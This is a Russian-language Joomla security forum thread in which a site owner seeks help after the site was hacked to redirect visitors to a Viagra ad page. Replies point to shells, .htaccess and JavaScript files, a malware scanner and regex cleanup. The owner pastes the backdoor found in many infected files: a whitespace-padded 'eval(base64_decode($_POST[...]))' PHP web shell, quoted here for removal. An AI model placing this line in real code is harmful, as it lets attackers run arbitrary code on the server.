Редирект на сайт с виагрой - Безопасность сайтов на Joomla

Здравствуйте! Недавно появилась проблема с сайтом. При нажатии на ссылки переводило на сайт с рекламой виагрой (не муз. группы). Тогда я просто убрал перенаправление и все стало нормально, но сейчас опять появилось и теперь даже не могу войти в админку- переводит на этот сайт. Что делать? Где искать начало проблемы? Помогите, пожалуйста!

Ищите шеллы, и возможную уязвимость как это могло произойти

P.S: Помимо вас, еще кто то имеет доступ!

Версия Joomla актуальная ? Проверяй "левые" папки на хостинге, файлы .htaccess ,  .js
сканер айболит в помощь

Появился доступ к сайту, к админке, но ничего не получается сохранить.. При нажатии на кнопку "сохранить" переводит на сайт опять.. как еще можно закрыть сайт?

яваскрипты побиты.

Восстановил сайт из копии, но скорее всего зараженные файлы остались. В письмах от хостинга есть список зараженных файлов (возможно зараженных). Подскажите, пожалуйста, что делать дальше?

вот по типу таких ссылка:

HEX}base64.inject.unclassed.7 : u1111111 : /var/www/u1111111/data/www/site-name/media/media/js/lib.php

Что делать? Как я понял base64.inject и т.д. и есть заражение... Что с этим делать, как чистить? Подскажите, пожалуйста. Заранее огромное спасибо!

Имеет смысл делать полноценную профилактику, так как нужно решать вопрос с корня, вредонос можите поискать с помощью AI-BOLIT, но не зная синтаксис кода, смысла вам туда лезть нету, лучше обратитесь к квалифицированному человеку

Через скрипт удалось найти и заменить, но полноценное совпадение нашлось убралось только в одном файле, но тем не менее эта вставка (base64 и т.д.) присутствует во многих файлах. Потом проверил сайт другим скриптом, вот что он выдал:

"File: /var/www/u1111/data/www/site-name/media/mod_vt_nivo_slider/css/system.php
String:: $_POST[

File: /var/www/u1111/data/www/site-name/media/mailto/images/alias.php
String:: $_POST[" и т.д.

Что именно удалять? Боюсь, удалить не то, что надо или неправильно, обрывком...

но не зная синтаксис кода, смысла вам туда лезть нету, лучше обратитесь к квалифицированному человеку

вам же написали

Если бы мне изначально было к кому обратиться- я бы так и сделал.

Помогите определить, что именно удалять? Нашел скрипт для быстрого поиска и замены, но опять же, не получается выбрать нужный кусок.

Вот пример кода, который есть в зараженном файле: "<?php                                                                                                                                                                                                                                                   eval(base64_decode($_POST['nf73356']));?>"

Причем вот здесь (в кв.скобках) "['nf73356']" всегда разные символы. Раскодировать не удается, пробовал разные декодеры. Вручную удалить тоже не получается...

Помогите определить, что именно удалять?

Вот пример кода, который есть в зараженном файле: "<?php                                                                                                                                                                                                                                                   eval(base64_decode($_POST['nf73356']));?>"

удаляй всю строку

Раскодировать не удается, пробовал разные декодеры. Вручную удалить тоже не получается...

А это и не надо раскодировать, это название переменной, а вот почему удалить не получается это вопрос...
 

Не получается, ибо каждый раз внутри квадратных скобок разные символы, во всех файлах разный код получается

Если удалять вручную, то там не одна сотня файлов...

что то и ручками приходится делать! даже если это и сотня файлов.

P.S: Тут поиск по файлам, через регулярку поможет!